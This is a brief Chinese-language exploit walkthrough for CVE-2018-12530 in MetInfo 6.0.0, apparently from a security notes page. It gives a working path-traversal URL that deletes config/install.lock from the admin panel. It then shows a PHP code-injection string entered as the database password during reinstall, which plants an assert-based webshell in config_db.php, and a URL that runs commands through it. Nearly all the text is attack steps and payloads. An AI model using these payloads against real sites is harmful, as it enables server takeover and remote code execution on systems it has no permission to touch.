跳到主要内容

Metinfo 6.0.0任意文件删除 (CVE-2018-12530)

访问http://ip/install发现需要删除文件才能重新安装

image-20221013210335311

进入管理员后台,构造payload删除config/install.lock文件

http://ip/admin/app/batch/csvup.php?fileField=test-1&flienamecsv=../../../config/install.lock

image-20221013210511644

访问http://ip/install重新安装,安装时输入的数据库密码为payload

"*/assert($_REQUEST[cmd])/*"

image-20221013211050195

测试webshell

/config/config_db.php?cmd=phpinfo();

image-20221013211202374